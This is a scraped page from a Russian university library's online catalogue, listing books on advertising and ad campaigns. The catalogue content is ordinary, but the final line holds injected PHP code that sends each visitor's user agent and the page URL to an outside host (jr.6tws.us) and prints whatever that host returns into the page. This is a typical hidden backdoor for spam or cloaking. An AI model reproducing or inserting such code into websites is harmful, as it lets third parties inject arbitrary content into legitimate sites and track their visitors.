Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

135 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Рекламная кампания")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 49
1. 
Назайкин, Александр. Рубричная реклама [Текст] : Практ. пособие / А. Назайкин, 2000. - 115 с.
2. 
Музыкант, Валерий Леонидович. Реклама и PR - технологии в бизнесе, коммерции, политике [Текст] : Учеб. пособие для вузов по специальностям: "реклама", "паблик рилейшнз", "маркетинг", "журналистика" / В. Л. Музыкант, 2001. - 686 с.
Ключевые слова 
Реклама -- Учебник и пособие * -- Рекламная кампания -- Паблик рилейшнз -- Политическая реклама -- БИЗНЕС РЕКЛАМНЫЙ -- ПАБЛИК РИЛЕЙШНЗ -- ПОЛИТИКА МАРКЕТИНГОВАЯ -- РЕКЛАМА ПОЛИТИЧЕСКАЯ -- СМИ - реклама -- Реклама - СМИ -- ЭЛЕКТОРАТ -- ИМИДЖ ПОЛИТИЧЕСКИЙ -- ЛИДЕР ПОЛИТИЧЕСКИЙ -- СЕГМЕНТИРОВАНИЕ -- ПОЗИЦИОНИРОВАНИЕ ТОВАРА -- ПОЛИТИКА ЦЕНОВАЯ -- ПРОМОУШН -- ЦИКЛ ЖИЗНЕННЫЙ ТОВАРА -- ПСИХОЛОГИЯ ПОТРЕБИТЕЛЯ -- РЕКЛАМА - ПРАВО -- РЕКЛАМА - ПСИХОЛОГИЯ -- РЕКЛАМА - ЭТИКА -- ТЕСТЫ - РЕКЛАМА -- РЕКЛАМА - СЛОВАРЬ ТЕРМИНОВ
3. 
Катернюк А. В. Современные рекламные технологии [Текст] : Учеб. пособие / А. В. Катернюк, 2001. - 316 с.
4. 
Гермогенова Л. Ю. Эффективная реклама в России. Практика и рекомендации [Текст] / Л. Ю. Гермогенова, 1994. - 252 с.
Держатели документа (Информация об экземплярах) 
5. 
Викентьев, Игорь Леонидович. Приемы рекламы и PUBLIC RELATIONS: 215 примеров, 130 учебных задач и 18 Практических приложений [Текст] : учебно-методический комплекс / И. Л. Викентьев, 2001. - 255 с.
Держатели документа (Информация об экземплярах) 
6. 
Основы рекламы [Текст] : Метод. указания по курсовому проектированию для студентов специальности 350700 - "Реклама пром. продукции и технологий" / ОмГТУ, 2001. - 15 с.
Держатели документа (Информация об экземплярах) 
Полный текст
7. 
Бузин, Валерий Александрович. Основы медиапланирования [Текст] : Курс лекций / В. Н. Бузин, 2002. - 203, [1] с.
Держатели документа (Информация об экземплярах) 
8. 
Ученова, Виктория Васильевна. История рекламы, или Метаморфозы рекламного образа [Текст] : Учеб. для вузов по специальности "Реклама" / В. В. Ученова, Н. В. Старых, 1999. - 335 с.
Держатели документа (Информация об экземплярах) 
9. 
Баженов Ю. К. Организация рекламы в магазине [Текст] : Учеб.-практ. пособие / Ю. К. Баженов, Е. В. Васькин, 1998. - 123 с.
Держатели документа (Информация об экземплярах) 
10. 
11. 
Барсукова, Светлана Васильевна. Международное рекламное дело [Текст] : Учеб. пособие по специальностям: "Финансы и кредит", "Бухгалт. учет и аудит", "Мировая экономика" / С. В. Барсукова, 1999. - 202 с.
Держатели документа (Информация об экземплярах) 
12. 
Гольман, Иосиф Абрамович. Практика рекламы [Текст] : Десять уроков для совет. бизнесмена / И. А. Гольман, Н. С. Добробабенко, 1991. - 141 с.
Держатели документа (Информация об экземплярах) 
13. 
Музыкант, Валерий Леонидович. Теория и практика современной рекламы [Текст] : Моногр. Ч. 1 : Зарождение и генезис рекламы, 1998. - 399 с.
Держатели документа (Информация об экземплярах) 
14. 
Музыкант, Валерий Леонидович. Теория и практика современной рекламы [Текст] : Учеб. пособие по курсу "Паблик рилейшнз" и "Реклама". Ч. 2 : Политические рекламные технологии, 1998. - 323, [1] с.
Держатели документа (Информация об экземплярах) 
15. 
Федотова, Лариса Николаевна. Социология рекламы [Текст] : Учеб. пособие для вузов / Л. Н. Федотова, 1999. - 338 с.
Держатели документа (Информация об экземплярах) 
16. 
Саркисян О. А. Конспект рекламиста [Текст] / О. А. Саркисян, О. А. Груздева, Г. В. Красовский, 1999. - 133 с.
Держатели документа (Информация об экземплярах) 
17. 
Валовая, Мария Дмитриевна. Азы древнейшего ремесла или 13 бесед о рекламе и маркетинге [Текст] / М. Д. Валовая, 1994. - 111 с.
Держатели документа (Информация об экземплярах) 
18. 
Практическое руководство по организации эффективной рекламной деятельности предприятия [Текст]. Т. 1, 1994. - 76 с.
Держатели документа (Информация об экземплярах) 
19. 
Рекламная деятельность [Текст] : Учеб. для вузов / Ф. Г. Панкратов, Ю. К. Баженов, Т. К. Серегина, В. Г. Шахурин, 2000. - 361, [1] с.
Держатели документа (Информация об экземплярах) 
20. 
Асеева Е. Н. Организация рекламной кампании [Текст] / Е. Н. Асеева, П. В. Асеев, 1997. - 111 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3054 - 20.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.82 с.12 запросов, 0.35c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;